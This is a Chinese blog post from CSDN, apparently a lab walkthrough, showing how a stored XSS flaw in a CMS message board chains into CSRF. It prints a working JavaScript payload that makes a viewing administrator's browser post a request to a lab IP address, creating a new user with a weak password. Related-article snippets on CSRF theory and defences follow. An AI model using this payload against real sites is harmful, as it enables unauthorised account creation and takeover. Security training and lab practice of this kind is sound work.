CSRF 漏洞实战

已于 2023-11-13 16:29:24 修改
阅读量266 收藏
点赞数
分类专栏: CSRF 跨站请求伪造 文章标签: csrf 安全 web安全
于 2023-11-13 16:26:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wj33333/article/details/134379138
版权

 CMS创建新用户

方法:攻击者可以利用 XSS 触发 CSRF 攻击。因为,可以利用 JS 发送 HTTP 请求。经过研究受害网站的业务流程,可以构造如下代码:

代码:

<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://10.9.47.44/cms/admin/user.action.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=wj33333&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>

前提:

我们发现CSM网站留言板存在xss漏洞

1.第一步:

  • 填写留言板并提交。

2.第二步:

  • 模仿管理员管理留言板。
  • 管理员登录账号

  • 查看留言板

到这里就已经完成了添加用户。

  • 查看管理员账号,发现是我们添加的账号

  • 登录

wj33333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSRF漏洞-01】跨站请求伪造漏洞靶场实战
cc
02-19 4034
跨站请求伪造(Cross-site request forgery,CSRF)是一种攻击,它强制终端用户在当前对其进行身份验证后的web应用程序上执行非本意的操作。CSRF攻击的主要目的在伪造更改状态(修改密码、转账等)的请求,而不是盗取数据,因为攻击者无法查看对伪造请求的响应。借助社工的一些帮助(例如通过电子邮件或聊天发送链接),攻击者可以诱骗用户执行攻击者选择的操作。
csrf漏洞实战演练
weixin_30886233的博客
03-27 122
定义: 修改密码操作:    转载于:https://www.cnblogs.com/csm21/p/10606331.html
CSRF漏洞实战靶场笔记
Forget_liu的博客
04-28 313
具体含义自己百度,token简单的来说就是防止表单重复提交和csrf攻击,每次页面提交都会带上token值,token值每次页面提交的都不同,是唯一的令牌,服务器后端会验证这个token来验证你的请求是否是csrf伪造的。我们把test用户添加用户的url地址,这里是添加一个用户名为111和密码为111的用户请求的地址,我们在登录了admin账号的搜狗浏览器新建窗口打开。实战中你可以把表单构造成自动提交,或者提交后转到某个具有迷惑性的地址来隐蔽你的csrf攻击,这里就不多叙述了。
渗透入门知识-CSRF漏洞原理到实战
SuperZedLv的博客
06-29 412
什么是CSRF漏洞? 跨站请求伪造,就是黑客以被攻击者的名义发送请求,完全合规合法。 CSRF原理 A站点存在CSRF漏洞、B站点为黑客伪造包含A站点正常请求链接的站点。 1)当被攻击者打开A站点,进行身份验证,登陆成功。A站点服务端返回给被攻击者的浏览器身份验证Cookie。被攻击者可以在A站点正常发送请求。 2)黑客伪造一个B站点其中包含A站点的某一请求(如转账请求)/广告图片包含A站点的请求。 3)黑客将B站点发送给被攻击者,被攻击者用打开A站点的浏览器打开B站点并触发黑客伪造的A站点请求。 4)这样
csrf漏洞实例分析
明哥哥知识分享
08-31 1013
1. 什么是csrf漏洞? 其实说白了,csrf漏洞的成因就是网站的cookie在浏览器中不会过期,只要不关闭浏览器或者退出登录,那以后只要是访问这个网站,都会默认你已经登录的状态。而在这个期间,攻击者发送了构造好的csrf脚本或包含csrf脚本的链接,可能会执行一些用户不想做的功能(比如是添加账号等)。这个操作不是用户真正想要执行的。 2. csrf漏洞危害 攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账…[外链
基础漏洞csrf挖掘实战
10-07
这种攻击一般依赖于目标对象之前已经通过了具有漏洞的网站的身份认证,并且攻击者向该网站发起的提交动作和网站的响应不被目标对象感知。当CSRF攻击成功时,我们就可以修改服务器端信息并很有可能完全接管用户的账号。...
Web漏洞实战教程(DVWA的使用和漏洞分析)2013完整版
03-06
《Web漏洞实战教程(DVWA的使用和漏洞分析)2013完整版》是一份深入探讨Web安全领域的宝贵资源,特别关注了DVWA(Damn Vulnerable Web Application)这一广泛用于安全测试和学习的在线平台。该教程全面覆盖了2013年时...
国内SRC漏洞挖掘技巧与经验分享
01-29
SQL注入、XSS跨站脚本、CSRF跨站请求伪造等常见漏洞需要特别关注。理解OWASP Top Ten,掌握各种攻防策略,有助于提高挖掘效率。 5. **安全配置**:不正确的系统配置也是漏洞的来源。例如,未打补丁的系统、弱密码...
bWAPP漏洞测试环境.rar
04-06
它包括识别和修复代码中的安全漏洞,如SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等。bWAPP提供了这些漏洞的模拟场景,让测试者可以实践识别和利用它们的方法。 2. **WAMP服务器**: WAMP是Windows、Apache...
集成web多个漏洞实战环境
06-25
【集成Web多个漏洞实战环境】是一个用于网络安全学习和测试的平台,它涵盖了Web应用程序中常见的多种漏洞,如SQL注入、XSS跨站脚本、CSRF跨站请求伪造、文件包含漏洞等。这个环境旨在帮助安全从业者和开发人员更好...
csrf漏洞简介及实战演示
ldzhhh的博客
06-15 1180
简介 CSRF(Cross-site request forgery)中文名叫跨站请求伪造。csrf不攻击网站服务器,而是冒充用户在站内的正常操作。攻击者盗用被攻击者的身份,以被攻击者的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以被攻击者的名义发送邮件、发消息,盗取账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。 原理 实战演示 靶场:dvwa 环境:Windows 10 1、修改密码,并用burpsuite拦截请求包 2、用burpsuite生成
实战攻防演之阻击CSRF威胁
小王的储物间
03-06 257
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
CSRF代码分析、漏洞讲解与post实战
永不垂头的博客
08-11 484
CSRF代码分析、漏洞讲解与post实战 一、csrf代码分析 index.php <!DOCTYPE html> <html> <head> <title>Login</title> </head> <body> <form action="" method="GET"> <p>name: <input type="text" name="name" /></
29.CSRF及SSRF漏洞案例讲解
mingyqf的博客
12-30 2805
CSRF&SSRF】—漏洞案例讲解—day29 一、CSRF—跨站请求伪造攻击 1、解释 CSRF漏洞解释,原理 CSRF(Cross-site request forgery) 跨站请求伪造,由客户端发起,是一种劫持受信任用户向服务器发送非预期请求的攻击方式,与XSS相似,但比XSS更难防范,常与XSS一起配合攻击 原理详解 攻击者盗用了你的身份信息,以你的名义发送恶意请求,对服务器来说这个请求是你发起的,却完成了攻击者所期望的一个操作 XSS 利用站点内内的信任用户,盗取cookie CS
CSRF和SSRF漏洞案例讲解
weixin_46739058的博客
04-09 3313
CSRF的概念 CSRF:跨站请求伪造(Cross-site request forgery)CSRF是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。当用户访问含有恶意代码的网页时,会向指定正常网站发送非本人意愿的数据请求包(如转账给hack,向hack发送API等)如果此时用户恰好登录了该正常网站(也就是身份验证是正常的)就会执行该恶意代码的请求,从而造成CSRF。 与在XSS章节中提到的在博客里写入获取cookie的代码,在管理员登录后台查看时就会窃取其cookie有异曲..
全站CSRF漏洞
Gblfy_Blog
12-15 888
文章目录二、解决方案2.1. 创建CSRF防御统一管理2.2. 创建csrfToken校验2.3. 加密工具类2.4. 查询实战 二、解决方案 2.1. 创建CSRF防御统一管理 package com.gblfy.sys.config.web.csrf; import com.gblfy.base.utils.SHACoderUtil; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpSession
跨站请求伪造(CSRF漏洞简介及靶场演示
seek_2022的博客
05-10 2775
文章目录一、CSRF漏洞简介(一)什么是CSRF?(二)CSRF的原理(三)CSRF的危害二、CSRF漏洞如何挖掘?三、靶场实战(一)线上搭建环境测试(二)靶场实战四、小结 一、CSRF漏洞简介 (一)什么是CSRFCSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者"Session Riding",通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信
网络安全:Web 安全 面试题.(CSRF
最新发布
网络安全领域___专研者.
06-21 707
网络安全面试是指在招聘过程中,面试官会针对应聘者的网络安全相关知识和技能进行评估和考察。这种面试通常包括以下几个方面: (1)基础知识:包括网络基础知识、操作系统知识、密码学知识等。 (2)安全技术:如入侵检测、防火墙配置、密码管理、漏洞分析等技术的掌握程度。 (3)安全实践:评估应聘者在实际工作中解决网络安全问题的能力,如案例分析、渗透测试等。 (4)安全意识:了解应聘者对网络安全的重视程度和责任心,以及在安全事故发生时的应对能力。 (5)项目经验:询问应聘者参与过的网络安全相关项目,了解其在项目中的具体
web漏洞挖掘 实战
08-29
以下是一些实战中常用的Web漏洞挖掘方法: 1. 信息收集:收集关于目标应用程序的信息,包括架构、技术栈、可用端点等。 2. 扫描和映射:使用自动化工具(如Burp Suite、Nessus)扫描目标应用程序,识别潜在的漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值